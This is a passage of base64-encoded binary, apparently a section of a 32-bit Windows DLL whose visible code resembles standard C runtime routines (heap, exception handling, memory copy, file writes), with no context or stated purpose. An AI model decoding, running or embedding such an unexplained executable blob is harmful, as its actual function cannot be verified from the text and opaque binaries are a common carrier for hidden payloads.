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AsBEFb/FSwBARCFwHQIiTVIZgEQ6zT/FRwAARCD+Hh1CmoCWKNIZgEQ6wWhSGYBEIP4Ag+EzwAAADvDD4THAAAAg/gBD4XoAAAAiV34OV0YdQiLB4tABIlFGIs1IAEBEDPAOV0gU1P/dRAPlcD/dQyNBMUBAAAAUP91GP/Wi/g7+w+EqwAAAH48gf/w//9/dzSNRD8IPQAEAAB3E+ihIwAAi8Q7w3QcxwDMzAAA6xFQ6Cf2//9ZO8N0CccA3d0AAIPACIvYhdt0aY0EP1BqAFPo3Z///4PEDFdT/3UQ/3UMagH/dRj/1oXAdBH/dRRQU/91CP8VLAEBEIlF+FPoyfr//4tF+FnrdTP2OV0cdQiLB4tAFIlFHDldGHUIiweLQASJRRj/dRzoDCEAAFmD+P91BDPA60c7RRh0HlNTjU0QUf91DFD/dRjoNCEAAIvwg8QYO/N03Il1DP91FP91EP91DP91CP91HP8VKAEBEIv4O/N0B1boqJ7//1mLx41l7F9eW4tN/DPN6CmW///Jw4v/VYvsg+wQ/3UIjU3w6DSY////dSSNTfD/dSD/dRz/dRj/dRT/dRD/dQzoFv7//4PEHIB9/AB0B4tN+INhcP3Jw4v/VYvsVot1CIX2D4SBAQAA/3YE6Die////dgjoMJ7///92DOgonv///3YQ6CCe////dhToGJ7///92GOgQnv///zboCZ7///92IOgBnv///3Yk6Pmd////dijo8Z3///92LOjpnf///3Yw6OGd////djTo2Z3///92HOjRnf///3Y46Mmd////djzowZ3//4PEQP92QOi2nf///3ZE6K6d////dkjopp3///92TOienf///3ZQ6Jad////dlTojp3///92WOiGnf///3Zc6H6d////dmDodp3///92ZOhunf///3Zo6Gad////dmzoXp3///92cOhWnf///3Z06E6d////dnjoRp3///92fOg+nf//g8RA/7aAAAAA6DCd////toQAAADoJZ3///+2iAAAAOganf///7aMAAAA6A+d////tpAAAADoBJ3///+2lAAAAOj5nP///7aYAAAA6O6c////tpwAAADo45z///+2oAAAAOjYnP///7akAAAA6M2c////tqgAAADowpz//4PELF5dw4v/VYvsVot1CIX2dDWLBjsFYFoBEHQHUOifnP//W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RCFwA+E0AMAAIO9POX//wEPjM8DAAD/hTDl////hTjl///pgwAAADwBdAQ8AnUhD7czM8lmg/4KD5TBQ0ODhUTl//8CibVA5f//iY0g5f//PAF0BDwCdVL/tUDl///oQxsAAFlmO4VA5f//D4VoAwAAg4U45f//AoO9IOX//wB0KWoNWFCJhUDl///oFhsAAFlmO4VA5f//D4U7AwAA/4U45f///4Uw5f//i0UQOYVE5f//D4L5/f//6ScDAACLDooT/4U45f//iFQPNIsOiUQPOOkOAwAAM8mLBgPH9kAEgA+EvwIAAIuFNOX//4mNQOX//4TbD4XKAAAAiYU85f//OU0QD4YgAwAA6waLtSjl//+LjTzl//+DpUTl//8AK4005f//jYVI5f//O00QczmLlTzl////hTzl//+KEkGA+gp1EP+FMOX//8YADUD/hUTl//+IEED/hUTl//+BvUTl////EwAAcsKL2I2FSOX//yvYagCNhSzl//9QU42FSOX//1CLBv80B/8VOAEBEIXAD4RCAgAAi4Us5f//AYU45f//O8MPjDoCAACLhTzl//8rhTTl//87RRAPgkz////pIAIAAImFROX//4D7Ag+F0QAAADlNEA+GTQIAAOsGi7Uo5f//i41E5f//g6U85f//ACuNNOX//42FSOX//ztNEHNGi5VE5f//g4VE5f//Ag+3EkFBZoP6CnUWg4Uw5f//AmoNW2aJGEBAg4U85f//AoOFPOX//wJmiRBAQIG9POX///4TAABytYvYjYVI5f//K9hqAI2FLOX//1BTjYVI5f//UIsG/zQH/xU4AQEQhcAPhGIBAACLhSzl//8BhTjl//87ww+MWgEAAIuFROX//yuFNOX//ztFEA+CP////+lAAQAAOU0QD4Z8AQAAi41E5f//g6U85f//ACuNNOX//2oCjYVI+f//XjtNEHM8i5VE5f//D7cSAbVE5f//A85mg/oKdQ5qDVtmiRgDxgG1POX//wG1POX//2aJEAPGgb085f//qAYAAHK/M/ZWVmhVDQAAjY3w6///UY2NSPn//yvBmSvC0fhQi8FQVmjp/QAA/xXcAAEQi9g73g+ElwAAAGoAjYUs5f//UIvDK8ZQjYQ18Ov//1CLhSjl//+LAP80B/8VOAEBEIXAdAwDtSzl//873n/L6wz/FRwAARCJhUDl//873n9ci4VE5f//K4U05f//iYU45f//O0UQD4IK////6z9qAI2NLOX//1H/dRD/tTTl////MP8VOAEBEIXAdBWLhSzl//+DpUDl//8AiYU45f//6wz/FRwAARCJhUDl//+DvTjl//8AdWyDvUDl//8AdC1qBV45tUDl//91FOijl///xwAJAAAA6KuX//+JMOs//7VA5f//6K+X//9Z6zGLtSjl//+LBvZEBwRAdA+LhTTl//+AOBp1BDPA6yToY5f//8cAHAAAAOhrl///gyAAg8j/6wyLhTjl//8rhTDl//9fW4tN/DPNXui3iP//ycNqEGhoMQEQ6HXU//+LRQiD+P51G+gvl///gyAA6BSX///HAAkAAACDyP/pnQAAADP/O8d8CDsFCHsBEHIh6AaX//+JOOjslv//xwAJAAAAV1dXV1fodJb//4PEFOvJi8jB+QWNHI0gewEQi/CD5h/B5gaLCw++TDEEg+EBdL9Q6OYVAABZiX38iwP2RDAEAXQW/3UQ/3UM/3UI6C74//+DxAyJReTrFuiJlv//xwAJAAAA6JGW